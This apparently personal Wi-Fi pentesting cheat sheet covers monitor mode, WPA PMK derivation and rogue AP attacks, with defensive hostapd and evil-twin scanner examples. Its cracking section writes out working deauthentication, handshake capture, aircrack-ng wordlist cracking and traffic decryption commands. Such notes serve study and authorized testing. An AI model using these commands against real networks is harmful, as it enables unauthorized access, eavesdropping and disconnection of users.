Resources
- https://github.com/koutto/pi-pwnbox-rogueap/wiki
- https://github.com/dh0ck/Wi-Fi-Pentesting-Cheatsheet/tree/main/Wifi/cheatsheet
Terminology + Acronyms
- AP: Access Point
- STA: Station
- BSS: Basic Service Set (AP + STA)
- DS: Distribution System (Wired Network)
- ESS: Extended Service Set (2+ wireless APs)
- WDS: Wireless Distribution Systems (DS over Wi-Fi)
- Wireless Bridging: Only WDS APs can communicate
- Wireless Repeating: STA + WDS APs can communicate
- IBSS (Ad-Hoc): Independent Basic Service Set (STA + STA without AP)
- Mesh Networks: Join 2+ Wi-Fi APs to form a single network
- Wi-Fi Direct: Direct, single-hop communication for printing, file sharing etc.
- Monitor Mode: Wireless-device state that allows capturing raw 802.11 frames and injecting packets
- BSSID: MAC Address of the AP
Resources
- https://reconshell.com/wireless-penetration-testing/
- https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Cards%20and%20Chipsets
Updating Airodump database
airodump-ng-oui-update
Loading and Unloading Wireless Drivers
sudo airmon-ng # reveals wireless device drivers + chipset
sudo lsusb -vv # reveals system USB devices
## Display driver settings (e.g. ath9k_htc)
sudo modinfo [driver_name]
## Add or remove modules from linux kernel
sudo modprobe ath9k_htc blink=0 # loads the driver (plus dependencies) and disables the blinking LED
sudo insmod [path/to/module.ko] # Manually loads a driver from any path (no dependency resolution, unlike modprobe)
## Modify parameters for modules
/etc/modprobe.d # May need to blacklist devices if two similar vendor drivers are present
## List all loaded modules + dependencies of each module
lsmod
## Remove modules and dependencies
sudo rmmod [modules] [dependencies]
Wireless Tools
## Deprecated utilities
iwconfig
iwlist
iwspy
iwpriv
# Wi-Fi Configuration Utilities
## Wireless devices information
sudo iw list
## Scan for Wireless AP in range (Managed mode only)
sudo iw dev wlan0 scan | grep SSID
## Determining Channel Number
sudo iw dev wlan0 scan | grep -E "DS Parameter set|SSID:"
## Create new virtual interface [wlan0 device, interface add, name, monitor mode]
sudo iw dev wlan0 interface add wlan0mon type monitor
## Bring up the interface post creation
sudo ip link set wlan0mon up
## Inspect new virtual interface information
sudo iw dev wlan0mon info
## Capture wireless frames via tcpdump
sudo tcpdump -i wlan0mon
## Delete virtual interface
sudo iw dev wlan0mon interface del
## Display regulatory information [power limits, restricted frequencies, manufacturer restrictions]
sudo iw reg get
sudo iw reg set AU # Can be overridden by an AP advertising a country code (802.11d)
/etc/default/crda # Modify REGDOMAIN to always set at boot
# Enable or Disable Wireless Devices [Wi-Fi, Bluetooth, Broadband etc.]
## Display all enabled wireless devices
sudo rfkill list
## Soft block/unblock device
sudo rfkill block [ID]
sudo rfkill unblock [ID]
sudo rfkill block all
sudo rfkill unblock all
mac80211 Wireless Framework
Replacing the ieee80211 framework (including Wireless Extension)
- https://wireless.wiki.kernel.org/en/developers/Documentation/nl80211
- Sits beneath cfg80211 in the Linux kernel; userspace configures it through the nl80211 netlink API
- Linux drivers are now based on the mac80211 framework
WPA Passphrase
- Generate a PMK
wpa_passphrase [SSID] [passphrase] # prints a wpa_supplicant network block whose psk= line is the 256-bit PMK
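What wpa_passphrase actually computes, as an added example (not from the page or the linked resources): the PMK is PBKDF2-HMAC-SHA1 over the passphrase with the SSID as salt, 4096 iterations, 256 bits. Because the PMK is a pure function of passphrase and SSID, a captured handshake can be checked against guesses offline, which is the weakness the cracking section below relies on and the reason WPA3's SAE exists. The SSID/passphrase pairs below are the IEEE 802.11i Annex test vector and constructed sample values.

```python
import hashlib
import hmac
import time

PBKDF2_ITERATIONS = 4096   # fixed by 802.11i for WPA/WPA2-PSK
PMK_LEN = 32               # 256-bit PMK


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """Return the 256-bit PMK for a WPA/WPA2-PSK network.

    802.11i defines PSK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096, 256 bits);
    wpa_passphrase prints exactly this as the 64 hex characters after `psk=`.
    """
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrase must be 8 to 63 printable ASCII characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"),
                               ssid.encode("utf-8"), PBKDF2_ITERATIONS, dklen=PMK_LEN)


def wpa_passphrase_block(passphrase: str, ssid: str) -> str:
    """Render a wpa_supplicant network block in the form wpa_passphrase emits
    (the commented '#psk=' plaintext line is deliberately omitted)."""
    return 'network={\n\tssid="%s"\n\tpsk=%s\n}\n' % (ssid, derive_pmk(passphrase, ssid).hex())


def pmk_matches(candidate: str, ssid: str, target_pmk: bytes) -> bool:
    """Constant-time comparison of a candidate passphrase's PMK against a known PMK."""
    try:
        return hmac.compare_digest(derive_pmk(candidate, ssid), target_pmk)
    except ValueError:          # a candidate outside the legal length range can never match
        return False


def offline_guess_cost(ssid: str, candidates: list, target_pmk: bytes) -> tuple:
    """Illustrates why WPA/WPA2-PSK is exposed to offline guessing: each guess costs one
    PBKDF2 run (2 blocks x 4096 = 8192 HMAC-SHA1 calls) and needs no interaction with the
    AP. Returns (index of the matching candidate or -1, seconds spent)."""
    start = time.perf_counter()
    for i, cand in enumerate(candidates):
        if pmk_matches(cand, ssid, target_pmk):
            return i, time.perf_counter() - start
    return -1, time.perf_counter() - start


if __name__ == "__main__":
    # IEEE 802.11i Annex H.4.1 test vector: passphrase "password", SSID "IEEE"
    print(wpa_passphrase_block("password", "IEEE"))
    # Constructed candidate list (sample values, not a real wordlist)
    idx, secs = offline_guess_cost("IEEE", ["letmein1", "password", "hunter22"],
                                   derive_pmk("password", "IEEE"))
    print("match at index %d after %.3f s" % (idx, secs))
```

Changing the SSID changes the salt, so the same passphrase on two networks yields two unrelated PMKs; this is also why rainbow tables for WPA are only practical per common SSID.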
Cracking Authentication Hashes
# For WPA-PSK and WPA2-PSK only; WPA3-PSK uses SAE (Simultaneous Authentication of Equals, the Dragonfly handshake) and is not vulnerable to offline attacks. Opportunistic Wireless Encryption (OWE) is also not vulnerable.
# Capture packets
sudo airodump-ng -c 3 -w wpa --essid wifu --bssid 34:08:04:09:3D:38 wlan0mon
# Deauthentication Attack
sudo aireplay-ng -0 1 -a 34:08:04:09:3D:38 -c 00:18:4D:1D:A8:1F wlan0mon # With 802.11w (PMF) enabled, stations ignore unprotected deauthentication frames
# Cracking Authentication Hash
aircrack-ng -w /usr/share/john/password.lst -e wifu -b 34:08:04:09:3D:38 wpa-01.cap
# Decrypting the traffic
airdecap-ng -b 34:08:04:09:3D:38 -e wifu -p 12345678 wpa-01.cap
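The AP-side configuration that the two caveats above point at, as an added example (not from the page; hostapd is assumed as the AP daemon, and the passphrases are placeholders): a WPA2-PSK network without Protected Management Frames, whose 4-way handshake can be captured and whose stations honour forged deauthentication, next to a WPA3 SAE network with PMF required. The SSID and channel are the ones used in the airodump-ng command above; everything else is constructed.

```conf
# --- weak.conf (constructed example) ---
# WPA2-PSK, PMF disabled: the handshake in wpa-01.cap is crackable offline with aircrack-ng,
# and aireplay-ng -0 deauthentication frames are accepted unauthenticated.
interface=wlan0
ssid=wifu
hw_mode=g
channel=3
wpa=2
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP
# placeholder, not a real passphrase
wpa_passphrase=CHANGEME-placeholder
ieee80211w=0

# --- hardened.conf (constructed example) ---
# WPA3-Personal: SAE gives a per-session PMK that cannot be derived from a captured exchange,
# ieee80211w=2 makes PMF mandatory so unprotected deauth/disassoc frames are dropped.
interface=wlan0
ssid=wifu
hw_mode=g
channel=3
wpa=2
wpa_key_mgmt=SAE
rsn_pairwise=CCMP
# placeholder, not a real password
sae_password=CHANGEME-placeholder
ieee80211w=2
# hash-to-element PWE derivation (sae_pwe=1 H2E only, 2 both); avoids the timing side channel of the
# original hunting-and-pecking loop
sae_pwe=2
```

hostapd does not support trailing comments on value lines, so comments are kept on their own lines; the two definitions are separate files and would not be merged into one.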
Modern Day Wireless Attacks
Link: https://posts.specterops.io/modern-wireless-attacks-pt-i-basic-rogue-ap-theory-evil-twin-and-karma-attacks-35a8571550ee
Rogue AP attacks
Evil Twin - a rogue AP advertising the target ESSID, used either to entice stations to connect to it or to jam the legitimate AP and cause denial of service.
+ Captive portal attacks
Karma - inducing stations that are actively probing to connect, by having the malicious AP answer their probe requests for whatever SSID they ask for (active probing usually does not occur anymore).
Mana - records probe requests in a hash table to track a device's PNL (Preferred Network List), and responds to broadcast probes with every network in that device's PNL.
Loud Mode - records all probe requests in the vicinity and responds to broadcast probes with everything recorded.
Known Beacon Attack - effectively brute-forcing the station's PNL
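The defender's counterpart to the rogue AP techniques above, and to the `iw dev wlan0 scan` commands in the Wi-Fi Configuration Utilities section, as an added example (not from the page or the linked resources): a parser for `iw scan` output that records BSSID, SSID, channel, signal and the RSN authentication suite of each BSS, then flags SSIDs that are advertised by BSSIDs outside an allow-list or with a downgraded security setting. The scan text and the allow-list are constructed; the BSSID/SSID pair from the page's airodump-ng command is reused for familiarity. Channel is read from `DS Parameter set` where present and derived from the frequency otherwise, which covers 5 GHz and 6 GHz BSSes beyond the page's 2.4 GHz example.

```python
import re
from collections import defaultdict

# Constructed sample of `sudo iw dev wlan0 scan` output (real output indents with tabs;
# the parser strips whitespace so either works). MACs other than the page's are made up.
SAMPLE_SCAN = """\
BSS 34:08:04:09:3d:38(on wlan0)
    freq: 2422
    capability: ESS Privacy ShortSlotTime (0x0411)
    signal: -45.00 dBm
    SSID: wifu
    DS Parameter set: channel 3
    RSN: * Version: 1
         * Group cipher: CCMP
         * Pairwise ciphers: CCMP
         * Authentication suites: PSK
         * Capabilities: 16-PTKSA-RC 1-GTKSA-RC (0x000c)
BSS 02:11:22:33:44:55(on wlan0)
    freq: 2437
    capability: ESS Privacy ShortSlotTime (0x0411)
    signal: -30.00 dBm
    SSID: wifu
    DS Parameter set: channel 6
    RSN: * Version: 1
         * Group cipher: CCMP
         * Pairwise ciphers: CCMP
         * Authentication suites: PSK
         * Capabilities: 1-PTKSA-RC 1-GTKSA-RC (0x0000)
BSS 02:aa:bb:cc:dd:ee(on wlan0)
    freq: 5180
    capability: ESS Privacy ShortSlotTime (0x0411)
    signal: -60.00 dBm
    SSID: corp-guest
    RSN: * Version: 1
         * Group cipher: CCMP
         * Pairwise ciphers: CCMP
         * Authentication suites: SAE
         * Capabilities: 1-PTKSA-RC 1-GTKSA-RC MFP-required MFP-capable (0x00cc)
"""

BSS_RE = re.compile(r"^BSS ([0-9a-f]{2}(?::[0-9a-f]{2}){5})")


def freq_to_channel(freq_mhz):
    """Map a centre frequency to an 802.11 channel number (2.4, 5 and 6 GHz bands)."""
    if freq_mhz == 2484:
        return 14
    if 2412 <= freq_mhz <= 2472:
        return (freq_mhz - 2407) // 5
    if 5000 < freq_mhz < 5900:
        return (freq_mhz - 5000) // 5
    if 5955 <= freq_mhz <= 7115:
        return (freq_mhz - 5950) // 5
    return None


def parse_iw_scan(text):
    """Return one dict per BSS block in `iw dev <if> scan` output."""
    nets, cur = [], None
    for raw in text.splitlines():
        m = BSS_RE.match(raw)
        if m:
            cur = {"bssid": m.group(1), "ssid": "", "freq": None, "channel": None,
                   "signal": None, "rsn": False, "akm": None, "mfp_required": False}
            nets.append(cur)
            continue
        if cur is None:
            continue
        line = raw.strip()
        if line.startswith("freq: "):
            cur["freq"] = int(line.split()[1])
        elif line.startswith("signal: "):
            cur["signal"] = float(line.split()[1])
        elif line.startswith("SSID:"):             # hidden SSIDs show up as an empty value
            cur["ssid"] = line[5:].strip()
        elif line.startswith("DS Parameter set: channel "):
            cur["channel"] = int(line.rsplit(" ", 1)[1])
        elif line.startswith("RSN:"):
            cur["rsn"] = True
        elif line.startswith("* Authentication suites: "):
            cur["akm"] = line.split(": ", 1)[1]
        elif line.startswith("* Capabilities:") and "MFP-required" in line:
            cur["mfp_required"] = True
    for n in nets:                                 # 5/6 GHz BSSes carry no DS Parameter set
        if n["channel"] is None and n["freq"] is not None:
            n["channel"] = freq_to_channel(n["freq"])
    return nets


def duplicate_ssids(nets):
    """SSID -> BSSIDs advertising it. More than one is either a legitimate multi-AP ESS
    or an evil twin; the allow-list in audit() is what tells them apart."""
    by_ssid = defaultdict(list)
    for n in nets:
        if n["ssid"]:
            by_ssid[n["ssid"]].append(n["bssid"])
    return {s: b for s, b in by_ssid.items() if len(b) > 1}


def audit(nets, known):
    """known maps each SSID you operate to {"bssids": set, "akm": "PSK"|"SAE"} (constructed).
    Returns (bssid, reason) findings for unknown twins and security downgrades."""
    findings = []
    for n in nets:
        exp = known.get(n["ssid"])
        if not exp:
            continue
        if n["bssid"] not in exp["bssids"]:
            findings.append((n["bssid"], "unknown BSSID advertising %s (possible evil twin)" % n["ssid"]))
        if not n["rsn"]:
            findings.append((n["bssid"], "open network using %s" % n["ssid"]))
        elif n["akm"] != exp["akm"]:
            findings.append((n["bssid"], "AKM %s where %s expected" % (n["akm"], exp["akm"])))
        if exp["akm"] == "SAE" and not n["mfp_required"]:
            findings.append((n["bssid"], "PMF not required on %s" % n["ssid"]))
    return findings


KNOWN_APS = {  # constructed allow-list of the APs an operator runs
    "wifu": {"bssids": {"34:08:04:09:3d:38"}, "akm": "PSK"},
    "corp-guest": {"bssids": {"02:aa:bb:cc:dd:ee"}, "akm": "SAE"},
}

if __name__ == "__main__":
    scan = parse_iw_scan(SAMPLE_SCAN)
    for n in scan:
        print("%s ch%-3s %6s dBm %-12s %s" % (n["bssid"], n["channel"], n["signal"], n["ssid"], n["akm"]))
    print("duplicates:", duplicate_ssids(scan))
    for bssid, why in audit(scan, KNOWN_APS):
        print("FINDING", bssid, why)
```

Run periodically from a managed-mode interface (no monitor mode needed, as the scan command on the page notes) and diff the findings over time; a new BSSID on your SSID with a stronger signal than your own AP is the classic evil twin signature, while a PSK suite appearing on an SSID you serve with SAE points at a downgrade attempt.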
